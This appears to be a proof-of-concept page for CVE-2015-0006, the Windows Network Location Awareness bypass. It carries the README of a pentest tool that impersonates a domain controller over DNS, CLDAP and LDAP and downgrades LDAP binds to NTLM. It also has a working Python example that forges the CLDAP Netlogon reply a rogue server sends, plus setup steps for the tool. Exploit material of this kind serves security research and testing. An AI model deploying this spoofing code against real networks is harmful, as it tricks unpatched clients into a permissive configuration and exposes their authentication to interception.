
CVE-2015-0006 PoC: Microsoft NLA Security Feature Bypass Vulnerability

Associated Vulnerability
Title: Microsoft NLA Security Feature Bypass Vulnerability (CVE-2015-0006)
Description: The Network Location Awareness (NLA) service in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not perform mutual authentication to determine a domain connection, which allows remote attackers to trigger an unintended permissive configuration by spoofing DNS and LDAP responses on a local network, aka "NLA Security Feature Bypass Vulnerability."
Description
Proof of concept for CVE-2015-0006. Fixed in MS15-005 (https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-005): the update corrects the NLA domain-connection check so that spoofed DNS and LDAP answers from an unauthenticated host on the local network no longer trigger the permissive domain configuration, so this PoC only affects clients that have not applied that update.
Readme
# IMPOSTER

A pentest tool used to attack Windows clients on rogue networks.

## Current version

### Features

* Downgrade the client's LDAP bind to NTLM authentication
* Fake the initial steps of a domain controller (DNS, CLDAP and LDAP) to fool Network Location Awareness into applying the domain profile

### Servers
DNS, CLDAP, LDAP
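The "initial steps of a domain controller" that the feature list and the changelog refer to are the DC locator exchange: the client resolves the domain's SRV records, then sends a CLDAP search (UDP/389) with a filter such as `(&(DnsDomain=corp.example)(Host=WS01)(NtVer=\06\00\00\00))`, and whoever answers with a well-formed `NETLOGON_SAM_LOGON_RESPONSE_EX` in the `Netlogon` attribute is treated as a domain controller. The following added example (written for this page, not code from the imposter project) builds that response blob as MS-ADTS 6.3.1.8 lays it out, wraps it in the CLDAP `SearchResultEntry` + `SearchResultDone` datagram a rogue server would send back, and parses a blob back into its fields so a captured answer can be inspected. All domain, host, site names and the GUID are constructed values; the compressed-name pointer offsets are relative to the start of the structure, which is why one offset table is shared across all eight names.

```python
"""Forge and parse the CLDAP "Netlogon ping" answer of a domain controller (MS-ADTS 6.3.1.8).
Added example for this page; names and GUID below are constructed, not real."""
import struct
import uuid

# Subset of the Flags field of NETLOGON_SAM_LOGON_RESPONSE_EX
DS_PDC_FLAG, DS_GC_FLAG, DS_LDAP_FLAG, DS_DS_FLAG = 0x1, 0x4, 0x8, 0x10
DS_KDC_FLAG, DS_TIMESERV_FLAG, DS_CLOSEST_FLAG, DS_WRITABLE_FLAG = 0x20, 0x40, 0x80, 0x100
DEFAULT_FLAGS = (DS_PDC_FLAG | DS_GC_FLAG | DS_LDAP_FLAG | DS_DS_FLAG
                 | DS_KDC_FLAG | DS_TIMESERV_FLAG | DS_CLOSEST_FLAG | DS_WRITABLE_FLAG)
LOGON_SAM_LOGON_RESPONSE_EX = 0x17
NT_VERSION_1, NT_VERSION_5EX = 0x1, 0x4
NAME_FIELDS = ("DnsForestName", "DnsDomainName", "DnsHostName", "NetbiosDomainName",
               "NetbiosComputerName", "UserName", "DcSiteName", "ClientSiteName")


def _put_name(name, buf, seen):
    """Append a compressed UTF-8 string (RFC 1035 4.1.4 labels). Pointer offsets are
    relative to the start of the structure, so `seen` is shared by every name."""
    labels = name.split(".") if name else []
    while labels:
        suffix = ".".join(labels)
        if suffix in seen:                          # reuse an earlier copy of this suffix
            buf += struct.pack(">H", 0xC000 | seen[suffix])
            return
        seen[suffix] = len(buf)
        label = labels.pop(0).encode("utf-8")
        buf += bytes([len(label)]) + label
    buf += b"\x00"                                  # root label terminates the name


def build_netlogon_response(dns_domain, dns_host, nb_domain, nb_host, domain_guid,
                            site="Default-First-Site-Name", user="", flags=DEFAULT_FLAGS):
    """NETLOGON_SAM_LOGON_RESPONSE_EX for a single-domain forest (forest name == domain name)."""
    buf = bytearray(struct.pack("<HHI", LOGON_SAM_LOGON_RESPONSE_EX, 0, flags))
    buf += uuid.UUID(domain_guid).bytes_le          # DomainGuid is stored little-endian
    seen = {}
    for name in (dns_domain, dns_domain, dns_host, nb_domain, nb_host, user, site, site):
        _put_name(name, buf, seen)
    buf += struct.pack("<IHH", NT_VERSION_1 | NT_VERSION_5EX, 0xFFFF, 0xFFFF)
    return bytes(buf)


def _get_name(data, pos, max_hops=16):
    """Decode one compressed name; returns (name, position after it). Bounds pointer
    hops so a hostile capture cannot loop the parser forever."""
    labels, end, hops = [], None, 0
    while True:
        n = data[pos]
        if (n & 0xC0) == 0xC0:                      # 14-bit pointer from structure start
            hops += 1
            if hops > max_hops:
                raise ValueError("pointer loop in compressed name")
            end = end if end is not None else pos + 2
            pos = struct.unpack_from(">H", data, pos)[0] & 0x3FFF
            continue
        pos += 1
        if n == 0:
            break
        labels.append(data[pos:pos + n].decode("utf-8"))
        pos += n
    return ".".join(labels), (pos if end is None else end)


def parse_netlogon_response(data):
    """Inverse of build_netlogon_response; also usable on a captured Netlogon attribute."""
    opcode, _sbz, flags = struct.unpack_from("<HHI", data, 0)
    if opcode != LOGON_SAM_LOGON_RESPONSE_EX:
        raise ValueError("opcode 0x%x is not LOGON_SAM_LOGON_RESPONSE_EX" % opcode)
    out = {"Flags": flags, "DomainGuid": str(uuid.UUID(bytes_le=bytes(data[8:24])))}
    pos = 24
    for field in NAME_FIELDS:
        out[field], pos = _get_name(data, pos)
    out["NtVersion"], out["LmNtToken"], out["Lm20Token"] = struct.unpack_from("<IHH", data, pos)
    return out


def _ber(tag, body):
    """Minimal BER TLV with definite length (bodies up to 65535 bytes)."""
    if len(body) < 0x80:
        length = bytes([len(body)])
    elif len(body) < 0x100:
        length = b"\x81" + bytes([len(body)])
    else:
        length = b"\x82" + struct.pack(">H", len(body))
    return bytes([tag]) + length + body


def cldap_reply(msg_id, blob):
    """One UDP datagram answering the client's CLDAP search: a SearchResultEntry carrying
    the Netlogon attribute followed by a SearchResultDone (resultCode success)."""
    assert 0 <= msg_id < 0x80                       # single-byte INTEGER is enough here
    mid = _ber(0x02, bytes([msg_id]))
    attr = _ber(0x30, _ber(0x04, b"Netlogon") + _ber(0x31, _ber(0x04, blob)))
    entry = _ber(0x64, _ber(0x04, b"") + _ber(0x30, attr))          # [APPLICATION 4]
    done = _ber(0x65, _ber(0x0A, b"\x00") + _ber(0x04, b"") + _ber(0x04, b""))  # [APPLICATION 5]
    return _ber(0x30, mid + entry) + _ber(0x30, mid + done)


if __name__ == "__main__":
    blob = build_netlogon_response("corp.example", "dc1.corp.example", "CORP", "DC1",
                                   "12345678-1234-5678-1234-567812345678")
    print(parse_netlogon_response(blob))
    print(cldap_reply(1, blob).hex())
```

The pre-MS15-005 client accepts this answer without any proof that the sender holds the domain's secrets, which is the whole bug: nothing in the blob is signed, and the GUID and names are attacker-chosen. On the defensive side, `parse_netlogon_response` can be pointed at the `Netlogon` attribute of a captured CLDAP reply to check whether the advertised `DnsHostName`, `DomainGuid` and site match a known domain controller.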

## Setup

The current version has been tested on Kali Linux but should work on other operating systems as well.

### Dependencies

* pyasn1
* dnspython

### Quick setup on Kali Linux
Use the following steps to set up imposter on a Kali Linux machine.
```
git clone https://github.com/bugch3ck/imposter.git
cd imposter/src
# dnspython is checked out into src/ and symlinked so that `import dns` resolves
# (the dnspython 2.x line is Python 3 only; if imposter is run under Python 2, check out a 1.x release)
git clone https://github.com/rthalley/dnspython.git
ln -s dnspython/dns dns
# the Debian/Kali package that provides the pyasn1 module is python-pyasn1
apt-get install python-pyasn1
```

## Changelog

### Version 0.1
Private release 2014-06-05. Implements DNS, CLDAP and LDAP. Can downgrade the LDAP bind to NTLM and fake a successful authentication to trick Network Location Awareness into setting the domain policy.
File Snapshot

```
[4.0K] /data/pocs/0f186a79892b480577370224b46c6d695a2565ab
├── [ 906] README.md
└── [4.0K] src
    ├── [1.8K] imposter.py
    ├── [1.5K] mscldap_server.py
    ├── [2.4K] mscldap_utils.py
    ├── [2.1K] msdns_server.py
    ├── [3.1K] msldap_server.py
    ├── [2.5K] msldap_utils.py
    ├── [4.0K] ntlm.py
    ├── [4.0K] proto
    │   ├── [  56] cldap.py
    │   ├── [   0] __init__.py
    │   ├── [  23] ldap.py
    │   ├── [ 658] rfc1798.py
    │   └── [ 22K] rfc2251.py
    └── [ 112] servers.py

2 directories, 14 files
```